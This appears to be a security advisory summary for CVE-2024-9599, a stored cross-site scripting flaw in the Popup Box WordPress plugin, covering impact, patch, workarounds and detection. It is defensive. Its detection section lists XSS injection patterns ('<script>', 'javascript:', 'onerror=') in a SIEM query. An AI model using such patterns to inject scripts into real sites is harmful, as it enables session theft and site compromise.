CVE-2024-9599
📋 TL;DR
The Popup Box WordPress plugin before version 4.7.8 contains a stored cross-site scripting (XSS) vulnerability in plugin settings. This allows authenticated administrators to inject malicious scripts that execute when other users view affected pages, even in WordPress multisite configurations where unfiltered_html is restricted. Only WordPress sites using vulnerable versions of this specific plugin are affected.
💻 Affected Systems
- Popup Box WordPress Plugin
📦 What is this software?
Popup Box by Ays Pro
⚠️ Risk & Real-World Impact
Worst Case
An attacker with admin access could inject malicious JavaScript that steals session cookies, redirects users to phishing sites, or performs actions on behalf of authenticated users, potentially leading to complete site compromise.
Likely Case
Malicious admin or compromised admin account injects tracking scripts, defaces content, or steals user session data from visitors viewing pages with the vulnerable popup.
If Mitigated
With proper access controls and admin account security, the vulnerability remains dormant as it requires admin privileges to exploit.
🎯 Exploit Status
Exploitation requires admin access to WordPress. The vulnerability is in plugin settings that aren't properly sanitized.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.7.8
Vendor Advisory: https://wpscan.com/vulnerability/9e8a2659-7a6c-4528-b0b2-64d462485b43/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find 'Popup Box' plugin. 4. Click 'Update Now' if update is available. 5. Alternatively, download version 4.7.8+ from WordPress repository and manually update.
🔧 Temporary Workarounds
Remove vulnerable plugin
allTemporarily disable or remove the Popup Box plugin until patched
wp plugin deactivate popup-box
wp plugin delete popup-box
Restrict admin access
allImplement strict access controls and monitoring for admin accounts
🧯 If You Can't Patch
- Implement strict monitoring of admin user activities and plugin settings changes
- Use web application firewall (WAF) rules to block XSS payloads in POST requests to admin-ajax.php and plugin settings pages
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins → Popup Box version. If version is below 4.7.8, system is vulnerable.Check Version:
wp plugin get popup-box --field=versionVerify Fix Applied:
Verify Popup Box plugin version is 4.7.8 or higher in WordPress admin panel.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to admin-ajax.php with script tags in parameters
- Admin user modifying popup box settings with JavaScript payloads
- Changes to popup-box plugin settings from unexpected IP addresses
Network Indicators:
- POST requests containing script tags to /wp-admin/admin-ajax.php with action parameters related to popup box
SIEM Query:
source="wordpress.log" AND ("popup-box" OR "admin-ajax.php") AND ("<script>" OR "javascript:" OR "onerror=" OR "onload=")